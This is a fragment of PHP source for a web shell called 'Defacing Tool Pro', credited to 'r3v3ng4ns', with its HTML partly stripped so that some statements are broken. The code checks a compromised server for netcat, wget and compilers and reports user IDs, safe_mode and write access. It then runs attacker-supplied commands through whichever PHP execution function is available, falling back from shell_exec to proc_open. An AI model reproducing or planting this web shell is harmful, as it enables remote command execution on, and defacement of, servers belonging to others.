xterm at /usr/X11R6/bin/xterm, "; if (@file_exists("/usr/bin/nc")) $pro2="nc at /usr/bin/nc, "; if (@file_exists("/usr/bin/wget")) $pro3="wget at /usr/bin/wget, "; if (@file_exists("/usr/bin/lynx")) $pro4="lynx at /usr/bin/lynx, "; if (@file_exists("/usr/bin/gcc")) $pro5="gcc at /usr/bin/gcc, "; if (@file_exists("/usr/bin/cc")) $pro6="cc at /usr/bin/cc "; $safe = @ini_get($safemode); if ($safe) $pro8="safe_mode: YES, "; else $pro7="safe_mode: NO, "; $pro8 = "PHP ".phpversion(); $pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6.$pro7.$pro8; $login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid(); $ip=@gethostbyname($_SERVER['HTTP_HOST']); //Turns the 'ls' command more usefull, showing it as it looks in the shell if(strpos($cmd, 'ls --') !==false) $cmd = str_replace('ls --', 'ls -F --', $cmd); else if(strpos($cmd, 'ls -') !==false) $cmd = str_replace('ls -', 'ls -F', $cmd); else if(strpos($cmd, ';ls') !==false) $cmd = str_replace(';ls', ';ls -F', $cmd); else if(strpos($cmd, '; ls') !==false) $cmd = str_replace('; ls', ';ls -F', $cmd); else if($cmd=='ls') $cmd = "ls -F"; //If there are some '//' in the cmd, its now removed if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir); ?>
[ Defacing Tool Pro v ] ?
by r3v3ng4ns - revengans@gmail.com
user: uid() euid() gid()
write permission:YES"; }else{ echo " no"; } ?>
server info:
pro info: ip
original path:
current path:
array("pipe", "r"),1 => array("pipe", "w"),2 => array("pipe", "w"),)){ $process = @proc_open("$what",$descpec,$pipes); if (is_resource($process)) { fwrite($pipes[0], ""); fclose($pipes[0]); while(!feof($pipes[2])) { $erro_retorno = fgets($pipes[2], 4096); if(!empty($erro_retorno)) echo $erro_retorno;//isso mostra tds os erros } fclose($pipes[2]); while(!feof($pipes[1])) { echo fgets($pipes[1], 4096); } fclose($pipes[1]); $ok_p_fecha = @proc_close($process); }else echo "It seems that this PHP version (".phpversion().") doesn't support proc_open() function"; }else echo "This PHP version ($pro7) doesn't have the proc_open() or this function is disabled by php.ini"; } $funE="function_exists"; if($safe){$fe="safemode";$feshow=$fe;} elseif($funE('shell_exec')){$fe="shell";$feshow="shell_exec";} elseif($funE('passthru')){$fe="passthru";$feshow=$fe;} elseif($funE('system')){$fe="system";$feshow=$fe;} elseif($funE('exec')){$fe="execc";$feshow="exec";} elseif($funE('popen')){$fe="popenn";$feshow="popen";} elseif($funE('proc_open')){$fe="procc";$feshow="proc_open";} else {$fe="nofunction";$feshow=$fe;} if($fu!="0" or !empty($fu)){ if($fu==1){$fe="passthru";$feshow=$fe;} if($fu==2){$fe="system";$feshow=$fe;} if($fu==3){$fe="execc";$feshow="exec";} if($fu==4){$fe="popenn";$feshow="popen";} if($fu==5){$fe="shell";$feshow="shell_exec";} if($fu==6){$fe="procc";$feshow="proc_open";} } $fe("$cmd 2>&1"); $output=ob_get_contents();ob_end_clean(); ?>

stdOut from $cmdShow\", using $feshow()";?>